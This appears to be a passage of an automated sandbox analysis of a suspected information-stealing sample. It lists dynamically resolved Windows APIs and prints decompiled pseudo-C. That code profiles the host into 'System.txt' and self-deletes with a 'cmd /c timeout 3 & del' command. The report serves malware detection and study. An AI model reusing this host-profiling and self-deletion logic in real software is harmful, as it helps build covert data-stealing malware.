                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,CreateToolhelp32Snapshot,00000000,GlobalMemoryStatusEx,00000000,FindClose,00000000,CopyFileW,00000000,GetTickCount,00000000,LocalFree), ref: 004057EC
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW,00000000,Process32NextW,00000000,Process32FirstW,00000000,CreateToolhelp32Snapshot,00000000,GlobalMemoryStatusEx,00000000,FindClose,00000000,CopyFileW,00000000,GetTickCount), ref: 004057FE
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW,00000000,GetModuleFileNameW,00000000,Process32NextW,00000000,Process32FirstW,00000000,CreateToolhelp32Snapshot,00000000,GlobalMemoryStatusEx,00000000,FindClose,00000000,CopyFileW), ref: 00405810
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA,00000000,SetDllDirectoryW,00000000,GetModuleFileNameW,00000000,Process32NextW,00000000,Process32FirstW,00000000,CreateToolhelp32Snapshot,00000000,GlobalMemoryStatusEx,00000000,FindClose), ref: 00405822
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLocalTime,00000000,GetLocaleInfoA,00000000,SetDllDirectoryW,00000000,GetModuleFileNameW,00000000,Process32NextW,00000000,Process32FirstW,00000000,CreateToolhelp32Snapshot,00000000,GlobalMemoryStatusEx), ref: 00405834
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000,GetLocaleInfoA,00000000,SetDllDirectoryW,00000000,GetModuleFileNameW,00000000,Process32NextW,00000000,Process32FirstW,00000000,CreateToolhelp32Snapshot), ref: 00405846
                                                                                                    • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000,GetLocaleInfoA,00000000,SetDllDirectoryW,00000000,GetModuleFileNameW,00000000,Process32NextW,00000000,Process32FirstW), ref: 00405858
                                                                                                    • GetProcAddress.KERNEL32(00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000,GetLocaleInfoA,00000000,SetDllDirectoryW,00000000,GetModuleFileNameW,00000000,Process32NextW), ref: 0040586A
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000,GetLocaleInfoA,00000000,SetDllDirectoryW,00000000,GetModuleFileNameW), ref: 0040587C
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000,GetLocaleInfoA,00000000,SetDllDirectoryW), ref: 0040588E
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000,GetLocaleInfoA), ref: 004058A0
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004058AF
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserNameW,advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000), ref: 004058BE
                                                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW,00000000,GetUserNameW,advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000), ref: 004058D0
                                                                                                    • GetProcAddress.KERNEL32(00000000,RegQueryValueExW,00000000,RegCreateKeyExW,00000000,GetUserNameW,advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000), ref: 004058E2
                                                                                                    • GetProcAddress.KERNEL32(00000000,RegCloseKey,00000000,RegQueryValueExW,00000000,RegCreateKeyExW,00000000,GetUserNameW,advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000), ref: 004058F4
                                                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW,00000000,RegCloseKey,00000000,RegQueryValueExW,00000000,RegCreateKeyExW,00000000,GetUserNameW,advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000), ref: 00405906
                                                                                                    • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid,00000000,RegOpenKeyExW,00000000,RegCloseKey,00000000,RegQueryValueExW,00000000,RegCreateKeyExW,00000000,GetUserNameW,advapi32.dll,00000000,CreateProcessW,00000000), ref: 00405918
                                                                                                    • GetProcAddress.KERNEL32(00000000,LookupAccountSidA,00000000,AllocateAndInitializeSid,00000000,RegOpenKeyExW,00000000,RegCloseKey,00000000,RegQueryValueExW,00000000,RegCreateKeyExW,00000000,GetUserNameW,advapi32.dll,00000000), ref: 0040592A
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW,00000000,LookupAccountSidA,00000000,AllocateAndInitializeSid,00000000,RegOpenKeyExW,00000000,RegCloseKey,00000000,RegQueryValueExW,00000000,RegCreateKeyExW,00000000,GetUserNameW), ref: 0040593C
                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership,00000000,CreateProcessAsUserW,00000000,LookupAccountSidA,00000000,AllocateAndInitializeSid,00000000,RegOpenKeyExW,00000000,RegCloseKey,00000000,RegQueryValueExW,00000000,RegCreateKeyExW), ref: 0040594E
                                                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyW,00000000,CheckTokenMembership,00000000,CreateProcessAsUserW,00000000,LookupAccountSidA,00000000,AllocateAndInitializeSid,00000000,RegOpenKeyExW,00000000,RegCloseKey,00000000,RegQueryValueExW), ref: 00405960
                                                                                                    • GetProcAddress.KERNEL32(00000000,RegEnumKeyW,00000000,RegOpenKeyW,00000000,CheckTokenMembership,00000000,CreateProcessAsUserW,00000000,LookupAccountSidA,00000000,AllocateAndInitializeSid,00000000,RegOpenKeyExW,00000000,RegCloseKey), ref: 00405972
                                                                                                    • GetProcAddress.KERNEL32(00000000,RegEnumValueW,00000000,RegEnumKeyW,00000000,RegOpenKeyW,00000000,CheckTokenMembership,00000000,CreateProcessAsUserW,00000000,LookupAccountSidA,00000000,AllocateAndInitializeSid,00000000,RegOpenKeyExW), ref: 00405984
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000,RegEnumKeyW,00000000,RegOpenKeyW,00000000,CheckTokenMembership,00000000,CreateProcessAsUserW,00000000,LookupAccountSidA,00000000,AllocateAndInitializeSid), ref: 00405996
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000,RegEnumKeyW,00000000,RegOpenKeyW,00000000,CheckTokenMembership,00000000,CreateProcessAsUserW,00000000,LookupAccountSidA), ref: 004059A8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000,RegEnumKeyW,00000000,RegOpenKeyW,00000000,CheckTokenMembership,00000000,CreateProcessAsUserW), ref: 004059BA
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000,RegEnumKeyW,00000000,RegOpenKeyW,00000000,CheckTokenMembership), ref: 004059CC
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000,RegEnumKeyW,00000000,RegOpenKeyW), ref: 004059DE
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000,RegEnumKeyW), ref: 004059F0
                                                                                                    • LoadLibraryA.KERNEL32(user32.dll), ref: 004059FF
                                                                                                    • GetProcAddress.KERNEL32(75490000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000), ref: 00405A14
                                                                                                    • GetProcAddress.KERNEL32(75490000,wvsprintfA,75490000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000), ref: 00405A29
                                                                                                    • GetProcAddress.KERNEL32(75490000,GetKeyboardLayoutList,75490000,wvsprintfA,75490000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000), ref: 00405A3E
                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll), ref: 00405A4D
                                                                                                    • GetProcAddress.KERNEL32(75B40000,ShellExecuteExW,shell32.dll,75490000,GetKeyboardLayoutList,75490000,wvsprintfA,75490000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam), ref: 00405A62
                                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00405A71
                                                                                                    • GetProcAddress.KERNEL32(77290000,RtlComputeCrc32,ntdll.dll,75B40000,ShellExecuteExW,shell32.dll,75490000,GetKeyboardLayoutList,75490000,wvsprintfA,75490000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000), ref: 00405A86
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                                                                                                    • API String ID: 2238633743-617434850
                                                                                                    • Opcode ID: 8a7debf825173666d64633fefa6854a254c857d9de9e6bbb9cb681206d11099e
                                                                                                    • Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
                                                                                                    • Opcode Fuzzy Hash: 8a7debf825173666d64633fefa6854a254c857d9de9e6bbb9cb681206d11099e
                                                                                                    • Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00419108 Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964synchronizationCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 4 419108-41910b 5 419110-419115 4->5 5->5 6 419117-4191a8 call 403980 call 4034e4 call 40357c call 40561c call 407d24 call 406c4c call 403798 call 403990 CreateMutexA 5->6 24 419f30-41a139 call 4034e4 call 403b98 call 4034e4 call 403b98 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 403508 call 404224 call 403508 call 4034e4 * 2 call 403508 * 2 call 4034e4 6->24 25 4191ae-4191bb call 4034e4 6->25 30 4191c0-4191c3 25->30 32 4191c5-4191e2 call 4036cc call 403798 30->32 33 4191e4-419259 call 418f9c call 406c4c call 406810 call 4037dc call 4176d8 call 418688 call 4176d8 call 403790 30->33 32->30 32->33 33->24 71 41925f-41926c call 4038dc 33->71 71->24 78 419272-419321 call 407428 call 406984 call 407428 call 406ae4 call 40795c call 407428 call 406984 call 4080c4 call 408328 call 40dc44 call 4045ec 71->78 123 419327-419328 78->123 124 419909-419c2e call 417290 call 403850 call 40dce8 call 406c4c call 406810 call 407a4c call 406810 call 406bb4 call 40377c call 406810 call 4066c0 call 40377c call 406810 call 406610 call 40377c call 406810 call 4065cc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 * 2 call 407d24 call 406810 call 403850 call 403798 call 4063a4 call 40653c call 40dee4 call 403850 78->124 126 41932a-419338 call 403790 123->126 401 419c30-419c54 call 403850 call 403798 124->401 402 419c59-419ca1 call 4176d8 call 418688 call 4050c8 call 403790 124->402 135 419901-419903 126->135 136 41933e-419340 126->136 135->124 135->126 139 419492-41949b 136->139 140 419346-419350 136->140 143 4194a1-4194d0 call 40795c call 40357c call 403a78 139->143 144 419825-41982e 139->144 146 419372-41937c 140->146 147 419352 call 40d7f0 140->147 206 419742-419820 call 403d2c * 2 call 407048 call 4038dc * 2 call 403850 call 403d2c * 2 call 4037dc call 403d2c call 414408 143->206 207 4194d6-419503 call 407428 143->207 152 419830-419846 call 403850 144->152 153 41984b-419854 144->153 155 4193b1-4193bb 146->155 156 41937e-4193ac call 414028 call 408120 call 405528 call 40dce8 146->156 164 419357-41936d call 4053d8 call 40dce8 147->164 152->153 153->135 161 41985a-41987d call 40795c call 4038dc 153->161 162 4193c2-4193cc 155->162 163 4193bd call 414098 155->163 156->155 211 4198f1-4198fc call 40dce8 161->211 212 41987f-4198ef call 418688 call 407428 * 2 call 403850 call 40dce8 161->212 172 4193ec-4193f6 162->172 173 4193ce-4193e0 call 415ea8 162->173 163->162 164->146 175 419402-41940c 172->175 176 4193f8-4193fd call 414cb8 172->176 173->172 202 4193e2-4193e7 call 4050c8 173->202 186 41942f-419439 175->186 187 41940e-41942a call 414408 175->187 176->175 197 419445-41944f 186->197 198 41943b-419440 call 414f40 186->198 187->186 209 419451-41947d GetSystemMetrics * 2 call 4178b4 call 40dce8 197->209 210 419482-41948c 197->210 198->197 202->172 206->144 207->24 242 419509-41950f 207->242 209->210 210->139 222 41948e 210->222 211->135 212->135 222->139 247 419734-419737 242->247 251 419514-41954a call 406fdc call 40377c call 403a78 247->251 252 41973d 247->252 289 419731 251->289 290 419550-41972c call 403c98 call 403850 call 403d2c * 2 call 4070bc call 40377c call 4034e4 call 403850 call 403d2c call 4070bc call 403d58 call 40377c call 403d2c call 40781c call 40377c call 403d2c * 2 call 407048 call 4038dc * 2 call 4037dc call 403d2c * 2 call 4037dc call 403d2c call 414408 251->290 252->144 289->247 290->289 401->402 415 419db1-419dd1 call 4087dc call 407d24 call 4038dc 402->415 416 419ca7-419cc4 call 40795c call 4045ec 402->416 430 419dd3-419de0 call 4038dc 415->430 431 419dec-419df9 call 4038dc 415->431 416->415 426 419cca-419ccb 416->426 427 419ccd-419d03 call 4047a8 call 40795c call 4045ec 426->427 447 419da9-419dab 427->447 448 419d09-419d18 call 4038dc 427->448 430->431 439 419de2-419de7 call 407dd4 430->439 431->24 440 419dff-419e03 431->440 439->24 440->24 443 419e09-419f2b call 4028e0 call 4062d8 call 403d3c call 4062d8 call 402754 call 403d2c call 40770c call 403e1c call 403d3c call 402754 call 403d2c call 407798 call 403d3c ExitProcess 440->443 447->415 447->427 448->447 455 419d1e-419d42 call 40795c call 4045ec 448->455 465 419d85-419d89 455->465 466 419d44-419d45 455->466 465->447 468 419d8b-419da4 call 4038dc call 418cf4 465->468 467 419d4c-419d7d call 406318 call 403a78 466->467 467->465 481 419d7f-419d83 467->481 468->447 481->465 481->467
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E00419108(char __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				void* _v56;
				char _v60;
				char _v64;
				signed int _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v88;
				char* _v92;
				char _v96;
				char _v100;
				char* _v104;
				void* _v108;
				char _v112;
				char _v241;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				intOrPtr _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				void* _v344;
				void* _v348;
				void* _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				intOrPtr _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				void* _t446;
				void* _t452;
				intOrPtr* _t453;
				intOrPtr _t546;
				intOrPtr* _t616;
				intOrPtr* _t623;
				intOrPtr* _t630;
				intOrPtr* _t637;
				intOrPtr _t651;
				intOrPtr* _t654;
				intOrPtr* _t657;
				intOrPtr* _t660;
				intOrPtr* _t663;
				intOrPtr _t668;
				intOrPtr* _t671;
				void* _t677;
				intOrPtr* _t714;
				intOrPtr _t756;
				signed int _t806;
				intOrPtr* _t827;
				intOrPtr* _t830;
				signed int _t837;
				signed int _t884;
				intOrPtr _t907;
				int _t920;
				intOrPtr* _t932;
				void* _t954;
				signed int _t955;
				signed int _t956;
				void* _t957;
				void* _t975;
				intOrPtr _t983;
				intOrPtr _t1001;
				intOrPtr* _t1045;
				intOrPtr* _t1072;
				void* _t1094;
				void* _t1102;
				void* _t1132;
				void* _t1134;
				void* _t1135;
				signed int _t1137;
				intOrPtr _t1140;
				intOrPtr _t1141;
				void* _t1146;
				void* _t1167;
				void* _t1173;
				void* _t1181;
				void* _t1183;

				_t1183 = __fp0;
				_t1130 = __edi;
				_t1140 = _t1141;
				_t957 = 0x51;
				do {
					_push(0);
					_push(0);
					_t957 = _t957 - 1;
					_t1142 = _t957;
				} while (_t957 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t1140);
				_push(0x41a13a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1141;
				E004034E4( &_v72);
				_v82 = 0;
				_v81 = 0;
				E0040357C( &_v88, 0x41a158);
				E0040561C();
				E00407D24( &_v308, _t1142);
				_push( &_v308);
				E00406C4C( &_v312, __ebx, __esi); // executed
				_pop(_t446);
				E00403798(_t446, _v312);
				_t452 = CreateMutexA(0, 0, E00403990(_v308)); // executed
				_v108 = _t452;
				_t453 =  *0x41b558; // 0x41c6a4
				if( *((intOrPtr*)( *_t453))() == 0xb7) {
					L68:
					_pop(_t983);
					 *[fs:eax] = _t983;
					_push(E0041A144);
					E004034E4( &_v652);
					E00403B98( &_v648, 2);
					E004034E4( &_v640);
					E00403B98( &_v636, 5);
					E00403508( &_v616, 0xa);
					E00403B80( &_v576);
					E00403508( &_v572, 2);
					E00403B80( &_v564);
					E00403508( &_v560, 2);
					E00403B80( &_v552);
					E00403508( &_v548, 2);
					E00403B80( &_v540);
					E00403508( &_v536, 2);
					E00403B80( &_v528);
					E00403508( &_v524, 2);
					E00403B80( &_v516);
					E00403508( &_v512, 2);
					E00403B80( &_v504);
					E00403508( &_v500, 2);
					E00403B80( &_v492);
					E00403508( &_v488, 0xa);
					E00403B98( &_v448, 2);
					E004034E4( &_v440);
					E00403B98( &_v436, 3);
					E004034E4( &_v424);
					E00403B98( &_v420, 2);
					E004034E4( &_v412);
					E00403B98( &_v408, 8);
					E004034E4( &_v376);
					E00403B98( &_v372, 4);
					E00403508( &_v356, 0xd);
					_t1001 =  *0x405f2c; // 0x405f30
					E00404224( &_v60, 5, _t1001);
					E00403508( &_v40, 7);
					E004034E4( &_v8);
					E004034E4( &_v112);
					E00403508( &_v104, 5);
					E00403508( &_v80, 3);
					return E004034E4( &_v64);
				} else {
					E004034E4( &_v112);
					_t954 = 0x44d;
					_t1137 = 0x41b0fc;
					while( *_t1137 != 0) {
						E004036CC();
						E00403798( &_v112, _v316);
						_t1137 = _t1137 + 1;
						_t954 = _t954 - 1;
						if(_t954 != 0) {
							continue;
						}
						break;
					}
					E00418F9C(_v112, _t954, _t957, _t1130, _t1137);
					E00406C4C( &_v324, _t954, _t1137); // executed
					E00406810(_v324, _t954, _t957,  &_v320, _t1130, _t1137);
					E004037DC( &_v32, _v320, _v88);
					E004176D8( &_v32, _t954, 0x80000, _v88, _t1130, _t1137);
					_t546 =  *0x41c8c0; // 0x300260, executed
					E00418688(_t546, _t954, _v32, _t1130, _t1137,  &_v16); // executed
					E004176D8( &_v16, _t954, 0x80000, _v88, _t1130, _t1137);
					_t1146 = E00403790(_v16) - 0x2710;
					if(_t1146 < 0) {
						goto L68;
					}
					E004038DC(_v16, 0x41a164);
					if(_t1146 == 0) {
						goto L68;
					}
					E00407428(0x41a184, _t954, 0x41a174, _v16, _t1137,  &_v328);
					E00406984(_v328, _t954,  &_v36, _t1130, _t1137);
					E00407428(0x41a1a0, _t954, 0x41a190, _v16, _t1137,  &_v332);
					E00406AE4(_v332, _t954,  &_v40, _t1130, _t1137);
					E0040795C(0x41a1ac,  &_v44, _v36, _t1146);
					_t968 = 0x41a1b8;
					E00407428(0x41a1c8, _t954, 0x41a1b8, _v16, _t1137,  &_v340);
					_t1017 =  &_v336;
					E00406984(_v340, _t954,  &_v336, _t1130, _t1137);
					E004080C4(_v336, _t1146);
					E00408328(_v40, _t954,  &_v336, _t1130, _t1137); // executed
					E0040DC44();
					_t1132 = E004045EC(_v44) - 1;
					if(_t1132 < 0) {
						L48:
						_push(_v8);
						_push(0x41a1ac);
						E00417290( &_v464, _t954, _t1017, _t1132, _t1137);
						_push(_v464);
						E00403850();
						E0040DCE8(_v460, _t954, "System.txt", _t1132, _t1137);
						E00406C4C( &_v472, _t954, _t1137);
						E00406810(_v472, _t954, _t968,  &_v468, _t1132, _t1137);
						_push(_v468);
						_push(0x41a3e8);
						E00407A4C( &_v480, _t954, _t1132, _t1137);
						E00406810(_v480, _t954, _t968,  &_v476, _t1132, _t1137);
						_push(_v476);
						_push(0x41a3e8);
						E00406BB4( &_v492);
						E0040377C( &_v488, _v492);
						E00406810(_v488, _t954, _t968,  &_v484, _t1132, _t1137);
						_push(_v484);
						_push(0x41a3e8);
						E004066C0( &_v504, _t1168);
						E0040377C( &_v500, _v504);
						E00406810(_v500, _t954, _t968,  &_v496, _t1132, _t1137);
						_push(_v496);
						_push(0x41a3e8);
						E00406610( &_v516);
						E0040377C( &_v512, _v516);
						E00406810(_v512, _t954, _t968,  &_v508, _t1132, _t1137);
						_push(_v508);
						_push(0x41a3e8);
						E004065CC( &_v528);
						E0040377C( &_v524, _v528);
						E00406810(_v524, _t954, _t968,  &_v520, _t1132, _t1137);
						_push(_v520);
						_push(0x41a3e8);
						_t616 =  *0x41b5b8; // 0x41b0b8
						E00406FDC( *_t616, _t954,  &_v540, _t1137, _t1168);
						E0040377C( &_v536, _v540);
						E00406810(_v536, _t954, _t968,  &_v532, _t1132, _t1137);
						_push(_v532);
						_push(0x41a3e8);
						_t623 =  *0x41b5c4; // 0x41b0b0
						E00406FDC( *_t623, _t954,  &_v552, _t1137, _t1168);
						E0040377C( &_v548, _v552);
						E00406810(_v548, _t954, _t968,  &_v544, _t1132, _t1137);
						_push(_v544);
						_push(0x41a3e8);
						_t630 =  *0x41b584; // 0x41b0b4
						E00406FDC( *_t630, _t954,  &_v564, _t1137, _t1168);
						E0040377C( &_v560, _v564);
						E00406810(_v560, _t954, _t968,  &_v556, _t1132, _t1137);
						_push(_v556);
						_push(0x41a3e8);
						_t637 =  *0x41b638; // 0x41b0ac
						E00406FDC( *_t637, _t954,  &_v576, _t1137, _t1168);
						E0040377C( &_v572, _v576);
						E00406810(_v572, _t954, _t968,  &_v568, _t1132, _t1137);
						_push(_v568);
						_push(0x41a3e8);
						E00406810(_v8, _t954, _t968,  &_v580, _t1132, _t1137);
						_push(_v580);
						_push(0x41a3e8);
						E00407D24( &_v588, _t1168);
						E00406810(_v588, _t954, _t968,  &_v584, _t1132, _t1137);
						_push(_v584);
						E00403850();
						_t651 =  *0x41b5f4; // 0x41b0bc
						_t1045 =  *0x41b5f4; // 0x41b0bc
						E00403798(_t651,  *_t1045);
						_push(_v24);
						_t654 =  *0x41b5f4; // 0x41b0bc
						_push( *_t654);
						E004063A4( &_v592, _t954, _t1132, _t1137);
						_push(_v592);
						_t657 =  *0x41b5f4; // 0x41b0bc
						_push( *_t657);
						E0040653C( &_v596, _t954, _t968, _t1132, _t1137);
						_push(_v596);
						_t660 =  *0x41b5f4; // 0x41b0bc
						_push( *_t660);
						E0040DEE4( &_v600, _t954, _t1168);
						_push(_v600);
						_t663 =  *0x41b5f4; // 0x41b0bc
						_push( *_t663);
						E00403850();
						_t1169 = _v81 - 1;
						if(_v81 == 1) {
							_push(_v76);
							_push(0x41a3b8);
							_push(_v80);
							E00403850();
							E00403798( &_v20, _v604);
						}
						E004176D8( &_v20, _t954, 0x80000, _v88, _t1132, _t1137);
						_t970 = 0;
						_t668 =  *0x41c8c0; // 0x300260
						E00418688(_t668, _t954, _v20, _t1132, _t1137,  &_v608);
						_t671 =  *0x41b60c; // 0x41c6a0
						 *((intOrPtr*)( *_t671))(_v108);
						E004050C8(0x41a3f4, _t954, _t1132, _t1137, _t1169);
						_t677 = E00403790(_v72);
						_t1170 = _t677 - 3;
						if(_t677 <= 3) {
							L62:
							E004087DC(_t954, _t1137);
							E00407D24( &_v616, _t1181);
							E004038DC(_v616, 0x41a424);
							if(_t1181 != 0) {
								L65:
								E004038DC(_v8, 0x41a430);
								if(__eflags == 0) {
									__eflags = _v82 - 1;
									if(_v82 == 1) {
										E004028E0( &_v304, 0x3c);
										_v304 = 0x3c;
										_v300 = 0x1c0;
										_v296 = 0;
										_v292 = 0;
										E004062D8(L"%comspec%",  &_v620, __eflags);
										_v288 = E00403D3C(_v620);
										E004062D8(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v628, __eflags);
										E00402754(0,  &_v640);
										E00403D2C( &_v636, _v640);
										E0040770C(_v636, _t954, 0,  &_v632, _t1137, __eflags);
										E00403E1C();
										_v284 = E00403D3C(_v624);
										E00402754(0,  &_v652);
										E00403D2C( &_v648, _v652);
										E00407798(_v648, _t954, 0,  &_v644, _t1137, __eflags);
										_v280 = E00403D3C(_v644);
										__eflags = 0;
										_v276 = 0;
										_t714 =  *0x41b564; // 0x41c768
										 *((intOrPtr*)( *_t714))( &_v304, E0041A4AC, _v632, _v628);
										ExitProcess(0);
									}
								}
								goto L68;
							}
							E004038DC(_v8, 0x41a430);
							if(_t1181 != 0) {
								goto L65;
							}
							E00407DD4(_t954, _t970, _t1132, _t1137, _t1181);
							goto L68;
						} else {
							_t970 =  &_v52;
							E0040795C(0x41a1ac,  &_v52, _v72, _t1170);
							_t1132 = E004045EC(_v52) - 1;
							if(_t1132 < 0) {
								goto L62;
							}
							_t1134 = _t1132 + 1;
							_t955 = 0;
							do {
								_push(0);
								E004047A8();
								_t1141 = _t1141 + 4;
								_t970 =  &_v56;
								E0040795C(0x41a2dc,  &_v56,  *((intOrPtr*)(_v52 + _t955 * 4)), 0);
								_t1173 = E004045EC(_v56) - 4;
